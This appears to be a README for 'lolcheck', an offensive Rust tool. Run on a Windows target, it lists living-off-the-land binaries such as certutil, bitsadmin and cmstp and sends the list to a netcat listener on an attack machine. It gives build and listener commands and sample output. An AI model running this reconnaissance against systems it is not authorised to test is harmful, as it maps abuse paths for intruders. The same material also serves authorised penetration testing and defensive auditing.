Build
cargo build --target x86_64-pc-windows-gnu --release
Setup example listener on attack machine.
nc -lvnp PORT | jq
On Target machine run lolcheck with the attack machines IP:PORT
lolcheck.exe <IP:PORT>
Example response from lolcheck on the nc listener
{
"found_binaries": [
"AddinUtil.exe: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe",
"AddinUtil.exe: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe",
"Aspnet_Compiler.exe: c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe",
"Aspnet_Compiler.exe: c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe",
"At.exe: C:\\WINDOWS\\System32\\At.exe",
"At.exe: C:\\WINDOWS\\SysWOW64\\At.exe",
"Atbroker.exe: C:\\Windows\\System32\\Atbroker.exe",
"Atbroker.exe: C:\\Windows\\SysWOW64\\Atbroker.exe",
"Bitsadmin.exe: C:\\Windows\\System32\\bitsadmin.exe",
"Bitsadmin.exe: C:\\Windows\\SysWOW64\\bitsadmin.exe",
"CertReq.exe: C:\\Windows\\System32\\certreq.exe",
"CertReq.exe: C:\\Windows\\SysWOW64\\certreq.exe",
"Certutil.exe: C:\\Windows\\System32\\certutil.exe",
"Certutil.exe: C:\\Windows\\SysWOW64\\certutil.exe",
"Cmd.exe: C:\\Windows\\System32\\cmd.exe",
"Cmd.exe: C:\\Windows\\SysWOW64\\cmd.exe",
"Cmdkey.exe: C:\\Windows\\System32\\cmdkey.exe",
"Cmdkey.exe: C:\\Windows\\SysWOW64\\cmdkey.exe",
"cmdl32.exe: C:\\Windows\\System32\\cmdl32.exe",
"cmdl32.exe: C:\\Windows\\SysWOW64\\cmdl32.exe",
"Cmstp.exe: C:\\Windows\\System32\\cmstp.exe",
"Cmstp.exe: C:\\Windows\\SysWOW64\\cmstp.exe",
"Colorcpl.exe: C:\\Windows\\System32\\colorcpl.exe",
"Colorcpl.exe: C:\\Windows\\SysWOW64\\colorcpl.exe",
"ComputerDefaults.exe: C:\\Windows\\System32\\ComputerDefaults.exe",
"ComputerDefaults.exe: C:\\Windows\\SysWOW64\\ComputerDefaults.exe",
"ConfigSecurityPolicy.exe: C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe",
...SNIP...
]
}